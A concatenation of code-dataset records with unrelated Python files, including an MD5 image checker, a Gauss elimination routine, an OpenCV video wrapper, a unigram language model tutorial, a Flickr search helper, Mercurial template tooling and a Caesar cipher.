inp:\n\t\tdata=inp.read(buffer_size)\n\t\tmday5=hashlib.md5()\n\t\twhile len(data)>0:\n\t\t\tmday5.update(data)\n\t\t\tdata=inp.read(buffer_size)\n\t\treturn mday5.hexdigest()\ndef validHex(s):\n\ttry:int(s,16);return True\n\texcept:return False\ndef checkHexValue(h):\n\tif validHex(h):\n\t\tif len(h)==32:\n\t\t\texists=gyazoMD5Exists(h)\n\t\t\tprint(\"%s EXISTS\"%h if exists else \"%s DOES NOT EXIST\"%h)\n\t\telse:print(\"Input hexadecimal value is not 32 characters long (md5 length)\")\n\telse:print(\"Input is not a valid hexadecimal value\")\ndef checkFileValue(f,ft):\n\tif ft==None:ft=\"txt\"\n\tif os.path.exists(f):\n\t\tif os.path.isfile(f):\n\t\t\twith open(f,'r')as inp:\n\t\t\t\tdata=inp.read()\n\t\t\t\tsplitter=None\n\t\t\t\tif not \"\\r\\n\" in data:\n\t\t\t\t\tif \"\\n\" in data:splitter=\"\\n\"\n\t\t\t\telse:splitter=\"\\r\\n\"\n\t\t\t\tif splitter:data=data.split(splitter)\n\t\t\t\tif type(data)==str:printExists(data);return\n\t\t\t\tfor d in data:\n\t\t\t\t\tif len(d)<32:continue\n\t\t\t\t\tif ft==\"csv\":\n\t\t\t\t\t\thashes=d.split(\",\")\n\t\t\t\t\t\tfor h in hashes:\n\t\t\t\t\t\t\tprintExists(h)\n\t\t\t\t\telse:printExists(d)\n\t\telse:print(\"Supplied path is not a file\")\n\telse:print(\"Supplied path does not exist\")\ndef checkDirValue(d,extensions=[\".png\"],ignore_case=True):\n\tif ignore_case:extensions=[ext.lower() for ext in extensions]\n\tfs={}\n\tif os.path.exists(d):\n\t\tif os.path.isdir(d):\n\t\t\tprint(\"Searching for files with any of the following extensions %s\"%extensions)\n\t\t\tprint(\"Ignoring case\" if ignore_case else \"Not ignoring case\")\n\t\t\tfor root,dirs,files in os.walk(d):\n\t\t\t\tprint(\"Checking %s for images\"%root)\n\t\t\t\tfor f in files:\n\t\t\t\t\tdata=os.path.splitext(f)\n\t\t\t\t\tif len(data)>1:\n\t\t\t\t\t\tif (ignore_case and (data[1].lower() in extensions)) or (not ignore_case and (data[1] in extensions)):\n\t\t\t\t\t\t\tfullpath=os.path.join(root,f)\n\t\t\t\t\t\t\tprint(\"\\tChecking %s\"%fullpath,end=\"\")\n\t\t\t\t\t\t\t#print(\"\\t\\tGetting MD5\",end=\"\")\n\t\t\t\t\t\t\tmday5=getMD5(fullpath)\n\t\t\t\t\t\t\t#print(\" %s\\n\\t\\tSearching Gyazo for %s\"%(mday5,mday5),end=\"\")\n\t\t\t\t\t\t\texists=gyazoMD5Exists(mday5)\n\t\t\t\t\t\t\tprint(\"\\tFOUND\" if exists else \"\\tNOT FOUND\")\n\t\t\t\t\t\t\tfs[fullpath]=(mday5,exists)\n\t\t\treturn fs\n\t\telse:print(\"Supplied path is not a directory\")\n\telse:print(\"Supplied path ain't existing\")\nargparser=argparse.ArgumentParser()\n#argparser.add_argument(\"-v\",action=\"store_true\",help=\"output verbosity\")\nargparser.add_argument(\"input\",type=str,help=\"the input md5 hash, directory or file containing hashes\")\nargparser.add_argument(\"-v\",\"--verbosity\",type=int,choices=[0,1,2],nargs='?',const=2)\nargparser.add_argument(\"-ft\",\"--filetype\",type=str,choices=[\"csv\",\"txt\"],help=\"determines how file input is parsed\")\nargparser.add_argument(\"-m\",\"--md5\",action=\"store_true\",help=\"force input type to md5 hash\")\nargparser.add_argument(\"-f\",\"--file\",action=\"store_true\",help=\"force input type to input file\")\nargparser.add_argument(\"-d\",\"--dir\",action=\"store_true\",help=\"force input type to input directory\")\nargs=argparser.parse_args()\nif args.md5:checkHexValue(args.input)\nelif args.file:checkFileValue(args.input,args.filetype)\nelif args.dir:checkDirValue(args.input)\nelse:\n\tif validHex(args.input):checkHexValue(args.input)\n\telif os.path.exists(args.input):\n\t\tif os.path.isfile(args.input):checkFileValue(args.input,args.filetype)\n\t\telif os.path.isdir(args.input):checkDirValue(args.input)\n\telse:print(\"Input is not a valid hex value or path\")","sub_path":"Image Data Storage/img_check.py","file_name":"img_check.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"92126218","text":"# -*- coding: utf-8 -*-\nimport json\nimport csv\nfrom numpy import *\nfrom musigma import MUSIGMA_V,MUSIGMA_A\n\nsum_action_info = []\nsum_voice_info = []\nfin_action_info = []\nfin_voice_info = []\nbeat_info = []\ninfo = []\nmax_length = 73\n\ndef ReadActionInfo(file_name): \n action_info = []\n file = open('res/'+file_name)\n lines = file.readlines()\n action_info_index = -1\n for i in range(len(lines)):\n if i % 3 == 0:\n # 确定帧数\n action_info_index += 1\n action_info.append([])\n elif i % 3 == 1:\n # 存入中心点坐标,即每一帧的前三位\n lines[i] = lines[i].replace('\\n','')\n s = json.loads(lines[i])\n for coord in s:\n action_info[action_info_index].append(coord)\n else:\n # 存入每个关节的坐标\n lines[i] = lines[i].replace('\\n','')\n s = json.loads(lines[i])\n for joint in s:\n for coord in joint:\n action_info[action_info_index].append(coord)\n file.close()\n sum_action_info.append(action_info)\n\ndef ReadVoiceInfo(file_name): \n voice_info = []\n file = open('data1/'+file_name)\n lines = file.readlines()\n # print(len(lines))\n for line in lines:\n line = line.replace('\\n','')\n s = json.loads(line)\n voice_info.append(s)\n file.close()\n sum_voice_info.append(voice_info)\n # print('voice___info: ' + str(matrix(sum_voice_info).shape))\n\ndef ReadBeatInfo(file_name):\n file = open('beats/'+file_name)\n lines = file.readlines()\n beat_num = []\n for line in lines:\n line = line.replace('\\n','')\n beat_num.append(int(float(line)))\n beat_info.append(beat_num)\n file.close()\n\ndef WriteCsv():\n for i in range(len(fin_action_info)):\n info.append(fin_voice_info[i]+fin_action_info[i])\n print('info: ' + str(matrix(info).shape))\n csvfile = open('train.csv','w',newline=\"\")\n mywriter = csv.writer(csvfile,dialect='excel')\n mywriter.writerows(info)\n csvfile.close()\n\nfor i in range(23):\n ReadActionInfo(str(i+1))\n ReadVoiceInfo(str(i+1)+'.txt')\n ReadBeatInfo(str(i+1)+'_beat.txt')\n\nfor k in range(len(sum_voice_info)):\n N=len(sum_voice_info[k])\n N1=len(sum_voice_info[k][0])\n matrix_voice=array(sum_voice_info[k])\n for i in range(0,N1):\n for j in range(0,N):\n matrix_voice[j,i]= (matrix_voice[j,i] - MUSIGMA_V[i][0]) / MUSIGMA_V[i][1]; \n sum_voice_info[k]=matrix_voice.tolist()\n\nfor k in range(len(sum_action_info)):\n M=len(sum_action_info[k])\n M1=len(sum_action_info[k][0])\n matrix_action=array(sum_action_info[k])\n for i in range(0,M1):\n for j in range(0,M):\n matrix_action[j,i]= (matrix_action[j,i] - MUSIGMA_A[i][0]) / MUSIGMA_A[i][1]; \n sum_action_info[k]=matrix_action.tolist()\n\nfor i in range(len(beat_info)):\n le=(len(beat_info[i])-1)//10\n for j in range(len(beat_info[i])-1-le):\n start_num = len(fin_voice_info)\n fin_action_info += sum_action_info[i][beat_info[i][j]:beat_info[i][j+1]]\n fin_voice_info += sum_voice_info[i][beat_info[i][j]:beat_info[i][j+1]]\n\n for k in range(max_length-(beat_info[i][j+1]-beat_info[i][j])):\n action_zero = [0 for k in range(66)]\n voice_zero = [0 for k in range(19)]\n fin_action_info.append(action_zero)\n fin_voice_info.append(voice_zero)\n # 加入在动作中的帧号\n for l in range(max_length):\n fin_voice_info[start_num+l].append(l)\n\n# 加入在总体中的帧号\nfor i in range(len(fin_voice_info)):\n fin_voice_info[i].append(i)\n\nfor i in range(len(fin_voice_info)):\n if len(fin_voice_info[i]) != 21:\n print(len(fin_voice_info[i]))\nprint('final voice info: ' + str(matrix(fin_voice_info).shape))\nprint('final action info: ' + str(matrix(fin_action_info).shape))\n\n\nN=len(fin_voice_info)\nN1=len(fin_voice_info[0])\nmatrix_voice=array(fin_voice_info)\nfor i in range(19,N1):\n mu=average(matrix_voice[:,i]) \n sigma=std(matrix_voice[:,i])\n for j in range(0,N):\n matrix_voice[j,i] = (matrix_voice[j,i] - mu) / sigma; \nfin_voice_info=matrix_voice.tolist()\n\nWriteCsv()\n","sub_path":"create_csv_file.py","file_name":"create_csv_file.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"82713662","text":"def gauss_elimination(X):\n A = X.copy()\n n, m = A.shape\n for i in range(0, n):\n # Search for maximum \n maxEl = abs(A[i][i])\n maxRow = i\n for k in range(i+1, n):\n if abs(A[k][i]) > maxEl:\n maxEl = abs(A[k][i])\n maxRow = k\n\n if i != maxRow:\n tmp = A[i, :].copy()\n A[i, :] = A[maxRow, :]\n A[maxRow, :] = tmp\n\n\n # 対角成分以下をゼロ\n for k in range(i+1, n):\n c = -A[k][i]/A[i][i]\n for j in range(i, n+1):\n if i == j:\n A[k][j] = 0\n else:\n A[k][j] += c * A[i][j]\n\n # Solve equation Ax=b\n x = [0 for i in range(n)]\n for i in range(n-1, -1, -1):\n x[i] = A[i][n]/A[i][i]\n for k in range(i-1, -1, -1):\n A[k][n] -= A[k][i] * x[i]\n return x","sub_path":"mathematical_computation101/code/gauss_elimination.py","file_name":"gauss_elimination.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"603065342","text":"\"\"\"\n%% Process video file\nfunction output = processVideoFile(filename, featureDesc, computeBool)\n\n Methods:\n readFrame - Read the next available frame from a video file.\n hasFrame - Determine if there is a frame available to read\n from a video file.\n getFileFormats - List of known supported video file formats.\n\n Properties:\n Name - Name of the file to be read.\n Path - Path of the file to be read.\n Duration - Total length of file in seconds.\n CurrentTime - Location from the start of the file of the current\n frame to be read in seconds.\n Tag - Generic string for the user to set.\n UserData - Generic field for any user-defined data.\n\n Height - Height of the video frame in pixels.\n Width - Width of the video frame in pixels.\n BitsPerPixel - Bits per pixel of the video data.\n VideoFormat - Video format as it is represented in MATLAB\n FrameRate - Frame rate of the video in frames per second.\n\"\"\"\n\n# Imports\nimport cv2\nimport processImage\nimport numpy as np\n\n\n# Read video file\nclass ReadVideoObject(object):\n videoObj = None\n videoObj_write = None\n\n def __init__(self, filename, feature_desc, filename_write):\n # Object Constructor\n self.filename = filename\n self.featureDesc = feature_desc\n self.filename_write = filename_write\n self.videoObj = cv2.VideoCapture(self.filename)\n print(\"Video reader object created\")\n\n # Read frame from video object\n # Recursive\n self.read_frame()\n # Release video object\n self.videoObj.release()\n # Destroy video objects\n self.videoObj.destroyAllWindows()\n print(\"Video reader object released\")\n # ret, frame = videoObj.read()\n\n def read_frame(self):\n # Read frame\n \"\"\"\n while(self.videoObj.isOpened()):\n ret, frame = self.videoObj.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('frame', gray)\n \"\"\"\n\n while True:\n # Capture frame-by-frame\n ret, frame = self.videoObj.read()\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray_t = np.transpose(gray)\n\n if self.filename_write is not None:\n four_cc = 'DIV3'\n fps = 30.0\n frame_size = np.shape(gray_t)\n color_bool = False\n self.videoObj_write = WriteVideoObject(self. filename_write, four_cc, fps, frame_size, color_bool)\n\n # Video writer\n self.videoObj_write.write_obj(gray_t)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n self.videoObj_write.desc_obj()\n\n\n# Write video object\nclass WriteVideoObject:\n\n # Object Constructor\n def __init__(self, filename_write, four_cc, fps, frame_size, color_bool):\n self.filename_write = filename_write\n self.four_cc = cv2.VideoWriter_fourcc(*four_cc)\n self.frame_size = frame_size\n self.fps = fps\n self.color_bool = color_bool\n\n self.videoObj_write = cv2.VideoWriter(filename=self.filename_write, fourcc=self.four_cc,\n fps=self.fps, frameSize=self.frame_size, isColor=self.color_bool)\n print(\"Video writer object created\")\n\n # Write frame to video object\n def write_obj(self, frame):\n self.videoObj_write.write(frame)\n print(\"Video writer - writing frame to object\")\n\n def desc_obj(self):\n # Object Destructor\n self.videoObj_write.release()\n print(\"Video writer object released\")\n# End\n\n\n","sub_path":"FrameWork/Python/35/processVideoFile.py","file_name":"processVideoFile.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13681028","text":"def intersect(t1 , t2): \n result = () \n for e in t1:\n if e in t1:\n result += (e,)\n return result\n\ntub1 = (1 ,\"two\" , 3)\ntub2 = (tub1 , 3.25)\n\nprint(intersect(tub1, tub2))\nprint(tub1)\nprint(tub2)","sub_path":"PNotes/Tubles.py","file_name":"Tubles.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"506082241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('resorts', '0023_auto_20151218_0446'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='resort',\n name='datetime_format',\n field=models.IntegerField(default=1, blank=True,\n choices=[(0, b'mm/dd/yyyy hh:mm:ss'), (1, b'dd/mm/yyyy hh:mm:ss')]),\n ),\n ]\n","sub_path":"project/apps/resorts/migrations/0024_resort_datetime_format.py","file_name":"0024_resort_datetime_format.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472795424","text":"import sys\nimport collections\nimport math\n\n\nSTATUS = 'train'\nPATH = '/Users/zz_zhang/勉強会/NLPチュートリアル/NLPtutorial2020/test/'\nINPUT_FILE_NAME = '01-train-input.txt'\nANSWER_FILE_NAME = '01-train-answer.txt'\nMODEL_FILE_NAME = 'tutorial01.model'\nLAMBDA_1 = 0.95\nLAMBDA_UNK = 1 - LAMBDA_1\nV = 1000000\nW = 0\nH = 0\n\ndef train_unigram(train_file):\n\n gram_counter = collections.Counter()\n total_length = 0\n for line in train_file:\n temp = line.replace('\\n', '').split(' ') + ['
    ']\n gram_counter.update(temp)\n total_length += len(temp)\n # print(total_counter, gram_counter)\n gram_counter = dict(sorted(gram_counter.items()))\n\n with open(MODEL_FILE_NAME, 'w') as model_file:\n res = ''\n for word, count in gram_counter.items():\n temp = word + ' ' + str(float(count) / total_length) + '\\n'\n res += temp\n model_file.write(temp)\n\n print('Model training finished, written in {}.'.format(MODEL_FILE_NAME))\n return res\n print('Model training failed.')\n return -1\n\n\ndef test_unigram(test_file):\n with open(MODEL_FILE_NAME) as model_file:\n model = {}\n for line in model_file:\n temp = line.replace('\\n', '').split(' ')\n model[temp[0]] = float(temp[-1])\n model = collections.Counter(model)\n\n entropy = 0.0\n coverage = 0.0\n total_length = 0\n for line in test_file:\n words = line.replace('\\n', '').split(' ') + ['']\n total_length += len(words)\n\n # calc entropy\n for word in words:\n p = LAMBDA_1 * model[word] + LAMBDA_UNK / V\n entropy -= math.log(p, 2)\n\n coverage += 1 if model[word] > 0 else 0\n\n entropy /= total_length\n coverage /= total_length\n # print(entropy, coverage)\n return 'entropy = ' + str(entropy) + '\\n' + 'coverage = ' + str(coverage) + '\\n'\n\n\ndef test(result, answer):\n detla = 1e-5\n items_r = result.replace('\\n', ' ').split(' ')\n items_a = answer.replace('\\n', ' ').replace('\\t', ' ').split(' ')\n\n if len(items_a) != len(items_r):\n return False\n for item_r, item_a in zip(items_r, items_a):\n try:\n r = float(item_r)\n a = float(item_a)\n if abs(r - a) > detla:\n return False\n except:\n if item_r != item_a:\n return False\n return True\n\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n STATUS = sys.argv[1]\n\n # STATUS = 'test'\n print(STATUS, 'mode.')\n if STATUS == 'train':\n func = train_unigram\n else:\n func = test_unigram\n INPUT_FILE_NAME = '01-test-input.txt'\n ANSWER_FILE_NAME = '01-test-answer.txt'\n\n with open(PATH + INPUT_FILE_NAME) as file:\n res = func(file)\n\n ans = ''\n with open(PATH + ANSWER_FILE_NAME) as ans_file:\n for line in ans_file:\n if len(line) > 1 and '#' not in line:\n ans += line\n if test(res, ans):\n print('Accept')\n else:\n print('Wrong Answer')\n\n","sub_path":"zzz/tutorial01/tutorial01.py","file_name":"tutorial01.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"108099616","text":"import urllib.request, json\n\nSEARCH_URL = 'https://api.flickr.com/services/rest/?method=flickr.photos.search'\n\nAPI_PARAM = '&api_key='\nLAT_PARAM = '&lat='\nLON_PARAM = '&lon='\nPER_PAGE_PARAM = '&per_page='\nPAGE_PARAM = '&page='\nFORMAT_PARAM = '&format='\n\nAPI_KEY = 'b8b5ee365c39800a925944f298b44e92'\nPER_PAGE = '5'\nPAGE = '1'\nFORMAT = 'json'\n\n\n# This method is responsible to retrieve 5 photo ids\n# from flickr API and return it as an array of string.\n\n# latitude: the latitude of the user (String)\n# longitude: the longitude of the user (String)\n\n# returns: an array of string containing 5 ids of photos\n# nearby the given lat and lon.\n\ndef getPhotoId(latitude, longitude):\n # Build the url.\n url = SEARCH_URL + API_PARAM + API_KEY + LAT_PARAM + latitude + LON_PARAM + longitude + PER_PAGE_PARAM + PER_PAGE + PAGE_PARAM + PAGE + FORMAT_PARAM + FORMAT\n\n # Send a GET request to the url, and retrieve the JSON.\n # It is advised to print this variable in order to understand it better.\n retrieved = urllib.request.urlopen(url).read()\n\n # Strip the outer part of json, because it has a header that wraps the json.\n retrieved = retrieved[14:-1] # [14:-1] means that we perform a substring to the retrieved json\n # from index 14 (inclusive) to the last index (exclusive).\n # Read python substring docs for more info.\n\n\n # The actual retrieved json was just a string; therefore, it needs to be parsed into a real json.\n data = json.loads(retrieved)\n\n # Get the values of 'photos' from the json.\n # It is advised to print this variable in order to understand it better\n page = data['photos']\n\n # Get the array of photo from 'photos'.\n # It is advised to print this variable in order to understand it better\n photos = page['photo']\n\n # This for loop will get the id of each photo in the array,\n # and put it inside a new array named photo_id\n photo_id = []\n for photo in photos:\n photo_id.append(photo['id'])\n\n return photo_id\n","sub_path":"flickrcontroller.py","file_name":"flickrcontroller.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"364848462","text":"\"\"\"\nProblem: #1.7\n\nRotate Matrix: Given an image represented by an NxN matrix, where each pixel in the image is 4 \nbytes, write a method to rotate the image by 90 degrees. Can you do this in place?\n\"\"\"\ndef swap_rows(matrix):\n n = len(matrix)\n for i in range(n // 2):\n matrix[i], matrix[n - i - 1] = matrix[n - i - 1], matrix[i]\n return matrix\n\ndef transpose_matrix(matrix):\n n = len(matrix)\n for i in range(n):\n for j in range(i):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n return matrix\n\ndef rotate(matrix):\n return transpose_matrix(swap_rows(matrix))\n\nmatrix = [[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34], [41, 42, 43, 44]]\nprint(rotate(matrix))\n","sub_path":"arrays-and-strings/rotate-matrix.py","file_name":"rotate-matrix.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"293185305","text":"# !usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom service import NoteService\nfrom model import Note\n\n\nclass ListWindow(QWidget):\n \"\"\"\n 查看用户列表/公开笔记列表/用户笔记列表的窗口\n \"\"\"\n ALLUSERSLIST = 0\n ALLNOTESLIST = 1\n MYNOTESLIST = 2\n def __init__(self, main_window, window_type = ALLUSERSLIST):\n super().__init__()\n self.main_window = main_window\n self.window_type = window_type\n self.initUI()\n\n \n def initUI(self):\n self.set_items() # 设置元件\n self.set_layout() # 设置布局\n \n def set_items(self):\n \"\"\"\n 设置一个按钮和一个文本框\n \"\"\"\n self.back_button = QPushButton('Back', self)\n self.back_button.setFixedSize(self.back_button.sizeHint())\n if self.window_type == self.ALLUSERSLIST:\n # 返回 ‘Note Manager’窗口\n self.back_button.clicked.connect(self.main_window.to_init_window)\n elif self.window_type == self.ALLNOTESLIST:\n # 返回 ‘Public Note’窗口\n self.back_button.clicked.connect(\n self.main_window.get_public_notes)\n else:\n # 返回 ‘My Note’窗口\n self.back_button.clicked.connect(\n self.main_window.deal_with_my_notes) \n self.text_browser = QTextBrowser()\n self.set_text()\n \n def set_layout(self):\n \"\"\" \n 设置布局 \n \"\"\"\n # 水平布局\n hbox = QHBoxLayout()\n hbox.addWidget(self.back_button, 0, Qt.AlignRight) # 使用了右对齐\n # 竖直布局\n vbox = QVBoxLayout()\n vbox.addWidget(self.text_browser, 0)\n # 竖直布局\n vbox1 = QVBoxLayout()\n vbox1.addLayout(hbox)\n vbox1.addLayout(vbox)\n \n self.setLayout(vbox1)\n \n def set_text(self):\n \"\"\"\n 设置显示在文本框的内容\n \"\"\"\n self.__noteservice = NoteService()\n if self.window_type == self.ALLUSERSLIST:\n text = self.all_users_list()\n elif self.window_type == self.ALLNOTESLIST:\n text = self.all_notes_list()\n else:\n text = self.my_notes_list()\n self.text_browser.setText(text)\n \n def all_users_list(self):\n # 获得所有用户名\n user_names = self.__noteservice.list_all_users()\n for i, user_name in enumerate(user_names):\n user_names[i] = '{:^33}{:<30}'.format(str(i), user_name)\n \n return '\\n'.join(user_names)\n\n def all_notes_list(self):\n # 获得所有公开笔记\n notes = self.__noteservice.list_all_notes()\n for i, note in enumerate(notes):\n if note.get_note_permission() == Note.PUBLIC:\n note_permission = 'PUBLIC'\n else:\n note_permission = 'PRIVATE'\n # 序号 笔记名 权限 by 创建者\n notes[i] = '{:^10}{:<30}{:<15} by {:<20}'.format(str(i), \\\n note.get_note_name(), \\\n note_permission, \\\n note.get_user_name())\n return '\\n'.join(notes)\n\n def my_notes_list(self):\n # 获得用户所有笔记\n notes = self.__noteservice.list_notes_by_user(\n self.main_window.user_name)\n for i, note in enumerate(notes):\n if int(note[0]) == Note.PUBLIC:\n note_permission = 'PUBLIC'\n else:\n note_permission = 'PRIVATE'\n # 序号 笔记名 权限\n notes[i] = ' {:<20}{:<30}{:<25}'.format(str(i), note[1], \\\n note_permission)\n \n return '\\n'.join(notes)","sub_path":"task10GUI/src/NoteUI/list_window.py","file_name":"list_window.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"439827106","text":"#!/usr/bin/env python3\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n# This script can be used to Mozilla-fy Mercurial templates.\n\nimport pathlib\nimport shutil\nimport subprocess\nimport sys\n\n\nREMOVE_DIRS = {\n 'coal',\n 'monoblue',\n 'spartan',\n}\n\nREMOVE_FILES = {\n 'static/background.png',\n 'static/style-extra-coal.css',\n 'static/style-monoblue.css',\n}\n\nCOPY_FILES = {\n 'atom/pushlog.tmpl',\n 'atom/pushlogentry.tmpl',\n 'gitweb_mozilla/firefoxreleases.tmpl',\n 'gitweb_mozilla/pushlog.tmpl',\n 'gitweb_mozilla/repoinfo.tmpl',\n 'static/jquery-1.2.6.min.js',\n 'static/livemarks16.png',\n 'static/moz-logo-bw-rgb.svg',\n}\n\nREPLACEMENTS = [\n # Replace logo HTML.\n (b'\\nMercurial',\n b'\\n
    \\n'\n b' \\n'\n b' \"mercurial\"\\n'\n b' \\n'\n b'
    '),\n\n # Insert pushlog link in page header.\n (b'changelog |\\n',\n b'changelog |\\n'\n b'pushlog |\\n'),\n\n (b'changelog |\\n',\n b'changelog |\\n'\n b'pushlog |\\n'),\n]\n\n# Files in gitweb_mozilla where REPLACEMENTS should not apply.\nGITWEB_IGNORE_REPLACEMENTS = {\n 'firefoxreleases.tmpl',\n 'pushlog.tmpl',\n 'repoinfo.tmpl',\n}\n\n\ndef main(source_templates, vct_templates_path, new_templates_path):\n # source_templates is the canonical templates to start from.\n # vct_templates is hgtemplates/ from v-c-t.\n # new_templates_path is templates directory to write to. It could be\n # v-c-t's hgtemplates/.\n\n # vct_templates_path could be the same as new_templates_path and we\n # need to copy files from vct_templates path that may get removed below.\n # So make a copy of all files that may be nuked.\n backups = {}\n for f in COPY_FILES:\n p = vct_templates_path / f\n with p.open('rb') as fh:\n backups[f] = fh.read()\n\n # Ensure new_templates_path is empty.\n if new_templates_path.exists():\n # But take care not to nuke the .patches directory.\n if new_templates_path == vct_templates_path:\n for p in new_templates_path.iterdir():\n if p.name == '.patches':\n continue\n\n if p.is_dir():\n shutil.rmtree(p)\n else:\n p.unlink()\n else:\n shutil.rmtree(new_templates_path)\n\n new_templates_path.mkdir(parents=True, exist_ok=True)\n\n # Make a pristine copy from the canonical templates. In the case\n # where vct_templates_path == new_templates_path we can't simply\n # shutil.copytree() because the destination exists. So we copy everything\n # in the root directory separately.\n for p in source_templates.iterdir():\n if p.is_dir():\n shutil.copytree(p, new_templates_path / p.name)\n else:\n shutil.copyfile(p, new_templates_path / p.name)\n\n # Remove files and directories that we don't want.\n for d in sorted(REMOVE_DIRS):\n d = new_templates_path / d\n shutil.rmtree(d)\n\n for f in sorted(REMOVE_FILES):\n f = new_templates_path / f\n f.unlink()\n\n # Now nuke gitweb_mozilla and make a fresh copy from gitweb.\n gitweb_mozilla = new_templates_path / 'gitweb_mozilla'\n\n if gitweb_mozilla.exists():\n shutil.rmtree(gitweb_mozilla)\n\n shutil.copytree(new_templates_path / 'gitweb', gitweb_mozilla)\n\n # Create all new files.\n for f in sorted(COPY_FILES):\n dest = new_templates_path / f\n with dest.open('wb') as fh:\n fh.write(backups[f])\n\n # We need to track all files in the destination so `hg import` below works.\n # TODO we should perhaps be a bit more careful about committing in the case\n # where new_templates_path == vct_templates_path.\n subprocess.run(['hg', 'addremove', '.'],\n cwd=new_templates_path,\n check=True)\n subprocess.run(['hg', 'commit', '-m',\n 'hgtemplates: synchronize vanilla templates'])\n\n # Change the logo URL.\n for f in sorted(gitweb_mozilla.iterdir()):\n if f.suffix != '.tmpl':\n continue\n\n if f.name in GITWEB_IGNORE_REPLACEMENTS:\n continue\n\n with f.open('rb') as fh:\n s = fh.read()\n\n for search, replace in REPLACEMENTS:\n if search not in s:\n continue\n\n print('replacing %s... in %s' % (search[0:24], f))\n\n s = s.replace(search, replace)\n\n with f.open('wb') as fh:\n fh.write(s)\n\n print('committing automated transformations')\n subprocess.run(['hg', 'commit', '-m',\n 'hgtemplates: perform common rewrites'],\n cwd=new_templates_path,\n check=True)\n\n # Apply all our patches. The order of patches is defined by a series\n # file. Kinda like how MQ works.\n patch_dir = vct_templates_path / '.patches'\n series = patch_dir / 'series'\n\n with series.open('r') as fh:\n for line in fh:\n line = line.strip()\n if not line:\n continue\n\n patch_path = patch_dir / line\n\n with patch_path.open('rb') as fh:\n patch = fh.read()\n\n print('applying patch %s' % patch_path.name)\n sys.stdout.flush()\n\n subprocess.run(['hg', 'import', '-'],\n input=patch,\n cwd=new_templates_path.parent,\n check=True)\n sys.stderr.flush()\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n source_templates, vct_templates, new_templates = sys.argv[1:]\n\n main(pathlib.Path(source_templates),\n pathlib.Path(vct_templates),\n pathlib.Path(new_templates))\n","sub_path":"hgtemplates/.patches/mozify-templates.py","file_name":"mozify-templates.py","file_ext":"py","file_size_in_byte":6373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"170620502","text":"# Caesar Şifreleme / Şifre çözme Programı\r\n# 21.11.2017, ders uygulaması\r\n\r\n# Verilen mesajı Şifreleyen fonksiyon\r\ndef sifrele(mesaj):\r\n sifrelimesaj=\"\"\r\n boy=len(mesaj)\r\n for i in range(boy): #mesajdaki her harf için\r\n kod=ord(mesaj[i])\r\n kod=kod+3\r\n if kod>90: # X,Y,Z harfleri için A,B,C olmali\r\n kod=kod-26\r\n sifreliharf = chr(kod)\r\n if (mesaj[i]!=\" \"):\r\n sifrelimesaj=sifrelimesaj+sifreliharf\r\n else:\r\n sifrelimesaj=sifrelimesaj+\" \"\r\n\r\n return sifrelimesaj\r\n\r\n\r\n# Verilen Şifreli Mesajı Çözen fonksiyon\r\ndef sifreCoz(smesaj):\r\n duzmesaj=\"\"\r\n boy=len(smesaj)\r\n for i in range(boy): #mesajdaki her harf için\r\n kod=ord(smesaj[i])\r\n kod=kod-3\r\n if kod<65: # A,B,C harfleri için X,Y,Z olmalı\r\n kod=kod+26\r\n duzharf = chr(kod)\r\n if (smesaj[i]!=\" \"):\r\n duzmesaj=duzmesaj+duzharf\r\n else:\r\n duzmesaj=duzmesaj+\" \"\r\n\r\n return duzmesaj\r\n\r\n### ANA PROGRAM\r\nm=input(\"Mesajınız: \")\r\nc=sifrele(m)\r\nprint(\"Mesajınızın Sifreli Kodu :\",c)\r\n\r\nm=input(\"sifreli Mesajı girin: \")\r\nc=sifreCoz(m)\r\nprint(\"Mesajınız :\",c)\r\n","sub_path":"10_Ceaser_sifreleme.py","file_name":"10_Ceaser_sifreleme.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"348747022","text":"import platform\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import 